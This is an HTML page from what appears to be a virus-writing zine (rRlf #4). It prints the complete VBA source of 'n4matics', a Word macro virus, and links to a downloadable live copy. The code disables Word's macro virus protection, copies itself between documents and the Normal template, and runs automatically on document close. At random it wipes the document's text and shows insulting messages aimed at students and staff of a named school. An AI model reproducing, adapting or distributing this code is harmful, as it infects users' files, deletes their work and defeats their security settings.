<html>
<head>
<title>rRlf #4</title>
</head>
<body text="#ffffff" link="#ff0f0f" vlink="#ff0f0f" alink="#ff0f0f" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Redemption</i>
<br><table cellpadding="9">
<tr>
<th><a href="rRlf.37.html">Last article</a></th>
<th><a href="rRlf.01.html">Table of contents</a></th>
<th><a href="rRlf.39.html">Next article</a></th>
</tr>
</table>
</center>
<p><b><u>n4matics by ppacket</u></b>
<p><pre>
Attribute VB_Name = "n4matics"
'name: n4matics virus
'author: ppacket
'date: feb 08 2k1

Private Sub infect()
On Error Resume Next
    
    Dim Nactive, Aactive As Boolean
        
    WordBasic.DisableAutoMacros 0
   
    With Application
        .UserName = "ppacket"
        .DisplayStatusBar = False
        .ScreenUpdating = False
    End With
    
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "ppacket"
        .Comments = "shit 2 all d students n staff of informatics sm fairview" & vbCr & _
                  "fuck you all"
        .Title = "ppacket's time to shine: informatics virus"
        .Execute
    End With
    
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    
    With ActiveDocument
        .ReadOnlyRecommended = False
    End With
    
    Set NTI = NormalTemplate.VBProject.VBComponents
    Set ADI = ActiveDocument.VBProject.VBComponents
    
    If NTI.Item("n4matics").Name <> "n4matics" Then
    ADI("n4matics").export "c:\n4mat.ics"
    Nactive = True
    ElseIf ADI.Item("n4matics").Name <> "n4matics" Then
    NTI("n4matics").export "c:\n4mat.ics"
    Aactive = True
    End If
    
    If Nactive Then
    NTI.import "c:\n4mat.ics"
    NormalTemplate.Save
    ElseIf Aactive Then
    ADI.import "c:\n4mat.ics"
    ActiveDocument.Save
    End If
    Kill ("c:\n4mat.ics")
    
    Randomize
    trigger = shit & damn & Int((66 * Rnd) + 1)
     
    If trigger = 26 Then
        Call Payback
    End If
    
End Sub

Sub AutoClose()
On Error Resume Next

    Call infect

    If opendocument.Saved = False Then
        opendocument.SaveAs FileName:=ActiveDocument.FullName
    End If

    ActiveDocument.Close savechanges = wdSaveChanges

End Sub

Private Sub Payback()
On Error Resume Next

    Randomize
    trigger = shit & damn & Int((99 * Rnd) + 1)
    If trigger = 10 Then
        Selection.WholeStory
        Selection.Delete unit:=wdCharacter, Count:=1
        With Selection.Font
        .Name = Arial
        .ColorIndex = wdGray50
        .Animation = wdAnimationShimmer
        .Size = 26
        .Position = center
        End With
            
        Selection.InsertBefore "Hehehehehehehehehehe" & vbCr & _
                               "You've been intruded" & vbCr & _
                                "By n4matics virus!!!"
        If ActiveDocument.Saved = False Then
            ActiveDocument.Save
        End If
    End If
    
    With Assistant
    .Visible = True
    .MoveWhenInTheWay = True
    .Animation = msoAnimationGetArtsy
    .Left = trigger
    .Visible = True
    End With

    With Assistant.NewBalloon
    .Icon = msoCritical
    .Heading = "n4matics Virus"
    .Text = "You've been intruded by" & vbCr & _
            "  those fucking ppl @ " & vbCr & _
            "informatics SM fairview"
    .Show
    End With

End Sub

Sub toolsmacro()

Call Payback

End Sub

Sub viewvbcode()

Call Payback

End Sub

</pre>
<p><a href="rRlf.38.zip">living virus</a>
</body>
</html>
